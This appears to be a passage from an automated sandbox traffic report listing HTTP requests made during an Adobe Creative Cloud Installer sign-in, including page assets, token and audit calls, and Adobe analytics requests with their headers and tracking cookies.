https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57e67ac4b/scripts.js HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57e67ac4b/en_US/messages.json HTTP/1.1Accept: application/json, text/plain, /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A
Source: global traffic	HTTP traffic detected: GET /img/social/f_logo_RGB-Blue_58.png HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /id?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1696437793261 HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USOrigin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dpm.demdex.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/social/apple.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /img/social/sml-apple-logo.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /id/rd?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1696437793261 HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USOrigin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dpm.demdex.netConnection: Keep-AliveCookie: demdex=86072171691128452991944543401542351402
Source: global traffic	HTTP traffic detected: GET /img/social/sml-google-logo.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: POST /signin/v2/tokens?credential=sso&checkReauth=false&puser=&t2Only=false&euid=&pbaPolicy= HTTP/1.1Accept: application/json, text/plain, /X-DEBUG-ID: dfe9ad98-0121-4e58-80a6-14b027bb059aX-IMS-CLIENTID: CreativeCloudInstaller_v1_0Content-Type: application/jsonReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comContent-Length: 2Connection: Keep-AliveCache-Control: no-cacheCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /id?d_visid_ver=5.4.0&d_fieldgroup=A&mcorgid=9E1005A551ED61CA0A490D45%40AdobeOrg&mid=85912006310227639011924320131914567332&ts=1696437794901 HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USOrigin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sstats.adobe.comConnection: Keep-AliveCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444994s%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1
Source: global traffic	HTTP traffic detected: GET /signin/v2/configurations/CreativeCloudInstaller_v1_0 HTTP/1.1Accept: application/json, text/plain, /X-DEBUG-ID: dfe9ad98-0121-4e58-80a6-14b027bb059aX-IMS-CLIENTID: CreativeCloudInstaller_v1_0Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /signin/v2/configurations/CreativeCloudInstaller_v1_0/context?contextId=WAM1_PHSP_21&locale=en_US HTTP/1.1Accept: application/json, text/plain, /X-DEBUG-ID: dfe9ad98-0121-4e58-80a6-14b027bb059aX-IMS-CLIENTID: CreativeCloudInstaller_v1_0Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /img/canvas/Kaizen.jpg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: POST /b/ss/adbims,adbadobenonacdcprod,adbadobeprototype/1/JS-2.22.4-LCS4/s7434179752555 HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USContent-Type: text/plain;charset=UTF-8Origin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sstats.adobe.comContent-Length: 5041Connection: Keep-AliveCache-Control: no-cacheCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true
Source: global traffic	HTTP traffic detected: POST /signin/v1/audit HTTP/1.1Accept: application/json, text/plain, /X-DEBUG-ID: dfe9ad98-0121-4e58-80a6-14b027bb059aX-IMS-CLIENTID: CreativeCloudInstaller_v1_0Content-Type: application/jsonReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comContent-Length: 604Connection: Keep-AliveCache-Control: no-cacheCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
